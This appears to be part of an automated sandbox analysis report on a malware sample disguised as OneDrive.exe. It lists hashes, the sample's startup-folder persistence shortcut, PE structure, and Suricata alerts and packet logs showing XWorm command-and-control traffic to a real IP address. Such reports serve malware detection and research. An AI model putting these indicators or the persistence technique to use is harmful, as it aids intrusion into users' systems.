                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nufzdics.jq0.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpeyh3er.55p.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tztrqkoj.w3i.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ze1us3um.wkr.psm1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zppytkgo.xo0.ps1

                  Download File
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk

                  Download File
                  Process:C:\Users\user\Desktop\OneDrive.exe
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 3 17:12:04 2024, mtime=Sat Aug 3 17:12:04 2024, atime=Sat Aug 3 17:12:04 2024, length=143360, window=hide
                  Category:dropped
                  Size (bytes):670
                  Entropy (8bit):4.579607507110265
                  Encrypted:false
                  SSDEEP:12:82skklsgcQwQDeg2MurqjA2zCZMD6bh8pZmV:82Q1OprWAJZMiMZm
                  MD5:67602B97CAFF2A4B50A8C598BED7C99E
                  SHA1:3E2E3F502522E5DDE93E2EB4CDB97D09D808BDCE
                  SHA-256:9212D3EC2DF8A69EBAC44743BC55DBA2E01B5099D905831C2D4D5E3D6C6F2784
                  SHA-512:B59DC16E2A3A60219F76852A54078140183B7B9F9F330AD6DBE964ACEC2949B73358DA9F3AFBA5337E28522DB3CE6621157039F33D2C4099AF740BC6CE50025A
                  Malicious:false
                  Preview:L..................F.... ..R.......R.......R........0...........................P.O. .:i.....+00.../C:\...................`.1......Y\.. PROGRA~3..H......O.I.Y\.....g........................P.r.o.g.r.a.m.D.a.t.a.....f.2..0...Y.. OneDrive.exe..J.......Y...Y...............................O.n.e.D.r.i.v.e...e.x.e.......J...............-.......I...........Gc.......C:\ProgramData\OneDrive.exe..3.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m.D.a.t.a.\.O.n.e.D.r.i.v.e...e.x.e.`.......X.......367706...........hT..CrF.f4... ..K$..Q...,...E...hT..CrF.f4... ..K$..Q...,...E..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):4.148450742999168
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:OneDrive.exe
                  File size:143'360 bytes
                  MD5:a1cd6f4a3a37ed83515aa4752f98eb1d
                  SHA1:7f787c8d72787d8d130b4788b006b799167d1802
                  SHA256:5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65
                  SHA512:9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355
                  SSDEEP:768:q0ND+ctkzIlNMKdj3BAFWPa9k7Bm6POwhsriO6t621sIwEk4w00wI:q0Nqctg8NyFv9kVm6POw6mOXEU
                  TLSH:38E3E3CB6E4442B3C79DFAB455A3733D032BA83E6BD38E4EC89B7E5A5B3264C4500255
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................N.... ........@.. ....................................@................................

                  File Icon

                  Icon Hash:8e172d4461e84423

                  Static PE Info

                  General

                  Entrypoint:0x40b34e
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66ABCED4 [Thu Aug 1 18:07:16 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb2f40x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x19718.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x260000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x93540x9400c75c424de6e42b8901d532689d63bdf0False0.49231946790540543data5.703301177756809IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0xc0000x197180x19800cb7d65eaad2cb036e490371590111ec9False0.07744523590686274data3.100989301354178IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x260000xc0x2009b56679f4167d4c05842c94a8c0304ffFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc2200xb5bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9205366357069144
                  RT_ICON0xcd7c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 655360.02651425529397847
                  RT_ICON0x1d5a40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 163840.06004959848842702
                  RT_ICON0x217cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.1004149377593361
                  RT_ICON0x23d740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.13062851782363977
                  RT_ICON0x24e1c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.27925531914893614
                  RT_GROUP_ICON0x252840x5adata0.7333333333333333
                  RT_VERSION0x252e00x24cdata0.4710884353741497
                  RT_MANIFEST0x2552c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-08-03T20:12:53.723672+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:43.727618+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:03.728860+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:39.904638+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:18.579448+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:50.936956+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:01.971998+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:01.973762+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:13.698782+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:17.664712+0200TCP2855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:28.877964+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:33.708698+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:18.577918+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:28.873985+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:08.846945+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:39.906190+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:13:15.336241+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:15.337507+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:18.713980+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:55.643055+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:25.649085+0200TCP2852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:58.733055+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:13:13.724165+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:23.699644+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:38.721339+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:50.938854+0200TCP2852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)497117000192.168.2.9213.219.149.161
                  2024-08-03T20:12:08.703840+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:48.726463+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9
                  2024-08-03T20:12:28.711921+0200TCP2852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes700049711213.219.149.161192.168.2.9

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Aug 3, 2024 20:12:05.671283007 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:05.671322107 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:05.671427011 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:05.679939032 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:05.679968119 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.168344021 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.168472052 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.170954943 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.170965910 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.171339035 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.216475010 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.219798088 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.264509916 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.332007885 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.332115889 CEST44349710104.20.4.235192.168.2.9
                  Aug 3, 2024 20:12:06.332166910 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.340961933 CEST49710443192.168.2.9104.20.4.235
                  Aug 3, 2024 20:12:06.488244057 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:06.493273973 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:06.493355989 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:06.636914015 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:06.641987085 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.703840017 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.747639894 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:08.859005928 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:08.864113092 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864129066 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864254951 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864269018 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864288092 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864300966 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:08.864331961 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.698781967 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.747715950 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:13.755780935 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:13.761254072 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761293888 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761389017 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761416912 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761464119 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761492014 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761518955 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:13.761545897 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:17.664711952 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:17.888252020 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.200766087 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.393431902 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.393485069 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.393513918 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.577918053 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.579447985 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.584330082 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.713979959 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.763253927 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.805782080 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.810720921 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.810831070 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.815766096 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.815855980 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.815906048 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.815990925 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.820753098 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.820812941 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.820817947 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:18.820841074 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.820873022 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:18.825681925 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.699644089 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.747715950 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:23.833636999 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:23.838740110 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.838756084 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.838881969 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.838896036 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.839025974 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.839035988 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.839119911 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:23.839131117 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:25.649085045 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:25.700793028 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:28.686388016 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:28.691531897 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:28.711920977 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:28.763329983 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:28.776278973 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:28.781351089 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:28.781460047 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:28.873985052 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:28.877964020 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:28.925091028 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.708698034 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.753855944 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:33.759036064 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759053946 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759068966 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759078979 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759155035 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759198904 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759284019 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:33.759299994 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.721338987 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.759844065 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:38.765084028 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765125036 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765182972 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765211105 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765239000 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765265942 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765295982 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:38.765324116 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:39.716955900 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:39.722101927 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:39.904638052 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:39.906189919 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:39.911318064 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.727617979 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.773690939 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:43.778958082 CEST497117000192.168.2.9213.219.149.161
                  Aug 3, 2024 20:12:43.779126883 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779141903 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779161930 CEST700049711213.219.149.161192.168.2.9
                  Aug 3, 2024 20:12:43.779197931 CEST700049711213.219.149.161192.168.2.9
